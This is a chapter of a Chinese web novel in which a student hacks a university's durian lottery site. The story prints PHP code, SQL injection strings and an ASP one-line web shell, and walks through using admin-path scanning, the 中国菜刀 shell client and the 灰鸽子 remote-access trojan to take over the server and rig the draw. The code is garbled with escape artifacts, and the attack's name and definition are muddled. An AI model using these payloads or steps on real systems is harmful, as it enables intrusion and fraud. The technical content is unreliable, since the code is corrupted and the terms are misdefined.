亲,欢迎光临88小说网!
错缺断章、加书:站内短信
后台有人,会尽快回复!
88小说网 > 都市言情 > 黑客精神大爆发 > 第56章 复制用户攻击
  • 主题模式:

  • 字体大小:

    -

    18

    +
  • 恢复默认

复制用户攻击是指基于漏洞数据库,通过扫描等手段对指定的远程或本地计算机系统的安全脆弱性进行检测,发现可利用漏洞的一种安全检测(渗透攻击)行为。

每年都会有毕业校友向后辈学弟学妹们提供捐赠物品。

在大三的时候,一位校友慷慨捐赠了一车榴莲。

关于榴莲分配的问题,引发了一些争议。

提案起初按照学院进行分配,随后由各学院自行分配。

在这种情况下,就会有机会进行不公开的操作。

各种反对的声音此起彼伏。

最终学校决定,在网站上安排一个抽取榴莲的程序。

学生们是否能够抽中榴莲完全取决于运气。

大多数人同意了这个提议。

软件学院的学生们充满喜悦与激情。

程序就会有漏洞。

赵南北的工具箱又启动了。

抱着试一试的态度,登录了抽奖的网页。

F12 看到了网页的源码。

<?php

\/\/ 连接数据库

$conn \\u003d mysqli_connect(\\\"localhost\\\", \\\"username\\\", \\\"password\\\", \\\"database_name\\\");

\/\/ 检查连接是否成功

if (!$conn) {

die(\\\"连接数据库失败: \\\" . mysqli_connect_error);

}

\/\/ 开始抽奖

function startdraw {

global $conn;

\/\/ 从数据库中获取参与抽奖的人员名单

$sql \\u003d \\\"SELEct name FRom participants\\\";

$result \\u003d mysqli_query($conn, $sql);

if (mysqli_num_rows($result) \\u003d\\u003d 0) {

echo \\\"没有参与抽奖的人员!\\\";

return;

}

\/\/ 随机选择一名获奖者

$winner \\u003d mysqli_fetch_assoc(mysqli_query($conn, \\\"SELEct name FRom participants oRdER bY RANd LImIt 1\\\"));

$winnerName \\u003d $winner[\\\"name\\\"];

\/\/ 从数据库中删除获奖者,以确保其不会重复中奖

mysqli_query($conn, \\\"dELEtE FRom participants whERE name\\u003d\\u0027$winnerName\\u0027\\\");

\/\/ 显示获奖者

echo \\\"恭喜 \\\" . $winnerName . \\\" 获得本次抽奖的大奖!\\\";

}

?>

<!doctYpE html>

<html>

<head>

<title>抽奖程序<\/title>…```

抽奖程序连接着数据库,有些复杂。

对该程序的注入包括:

(1)

\\u0027a\\u0027\\u003d\\u0027a

(2)

1\\u003d1 -- %20

(3)

1\\u003d1 -- %23

获取了管理员的用户名,密码。

Admin adminedu。

现在需要找到网站管理员登录界面。

启动“御剑”扫描后台登录地址。

使用管理员的账号,密码登录。

在文本编辑器中,上传一句话木马。

asp的一句话是: <%eval request (\\\"pass\\\")%>

使用“中国菜刀”连接。

上传“灰鸽子”客户端。

在“中国菜刀”中,启动cmd。

c:\/ huigezi.exe 回车。

等待灰鸽子上线。

找到参与抽奖的人员数据库。

里面符合抽检条件的有人。

赵南北将自己寝室的八个人的名字都复制了2000遍。

数据库的参与抽奖人员就达到了人。

赵南北的寝室获得了57%的中奖概率。

抽奖程序对于重复中奖进行了限制,每人每天只能中奖一次。

开始抽奖之后,赵南北的寝室每天都能获得至少一个榴莲。

为了复制用户攻击攻击,以下是一些建议:

1. 在漏洞扫描过程中,攻击者通常会通过扫描开放的端口、服务和漏洞信息来判断目标系统的安全性。因此,可以通过隐藏漏洞信息来减少漏洞扫描攻击的成功率。例如,关闭不必要的端口和服务,隐藏敏感信息,如用户名和密码等。

2. 制定严格的安全策略,包括访问控制、权限管理、加密传输等,以保护目标系统的安全。例如,限制用户的访问权限,对敏感数据进行加密传输,使用强密码策略等。

3. 配置防火墙规则,过滤掉不必要的流量和恶意请求。防火墙可以阻止未经授权的网络流量进入或离开目标系统,从而减少漏洞扫描攻击的可能性。

4. 安装杀毒软件可以帮助检测和清除恶意软件,防止漏洞扫描攻击的进行。杀毒软件可以实时监控文件和进程的变化,拦截恶意代码的执行,保护目标系统的安全。

5. 定期更新操作系统和应用程序的补丁,修复已知的漏洞和安全问题。及时更新补丁可以减少漏洞扫描攻击的成功率,提高目标系统的安全性。